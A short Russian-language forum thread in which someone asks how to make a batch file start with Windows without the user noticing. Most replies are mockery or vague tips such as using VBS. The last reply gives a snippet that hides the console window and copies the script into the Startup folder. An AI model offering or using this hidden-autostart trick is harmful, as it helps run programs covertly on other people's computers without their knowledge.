Настя Падкина

как добавить bat файл в автозагрузку windows и как сделать так что бы юзер не увидел то что batnik запущен??

Валерий Мигунов

Новые недохакеры...

Евгений Бехтерев

autoexec.bat юзай а у меня не спрашивай даже сам давай воот меня никто не учил сам все учил искал мучался так что ты давай сам сам то пока еще ты юзер ))) 😛

Виолета Краун

bat никак не скрыть попробуй скрипты vbs они как bat только невидимы и они хоть чуть-чуть похожи на програмирование

Анна Исаева

По простому вот
По взрослому в гуглах

cmdow @ /HID
@echo off

copy %0 "%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\baby.bat" /y